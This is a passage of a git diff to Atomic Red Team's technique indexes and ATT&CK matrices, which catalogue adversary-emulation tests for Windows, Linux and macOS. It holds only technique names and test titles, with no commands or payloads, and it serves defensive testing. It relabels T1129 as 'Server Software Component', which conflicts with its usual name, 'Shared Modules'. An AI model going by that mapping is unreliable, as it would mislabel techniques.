 - [T1055.002 Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md)
   - Atomic Test #1: Portable Executable Injection [windows]
 - T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -806,7 +806,8 @@
   - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
   - Atomic Test #9: WMI Execute rundll32 [windows]
   - Atomic Test #10: Application uninstall using WMIC [windows]
-- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1129 Server Software Component](../../T1129/T1129.md)
+  - Atomic Test #1: ESXi - Install a custom VIB on an ESXi host [windows]
 - [T1059.007 Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md)
   - Atomic Test #1: JScript execution to gather local computer information via cscript [windows]
   - Atomic Test #2: JScript execution to gather local computer information via wscript [windows]

atomics/Indexes/Matrices/linux-matrix.md

@@ -1,9 +1,9 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -44,7 +44,7 @@
 |  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/macos-matrix.md

@@ -1,9 +1,9 @@
 # macOS Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -46,7 +46,7 @@
 |  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Plist File Modification](../../T1647/T1647.md) |  |  |  |  |  |  |  |
 |  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms 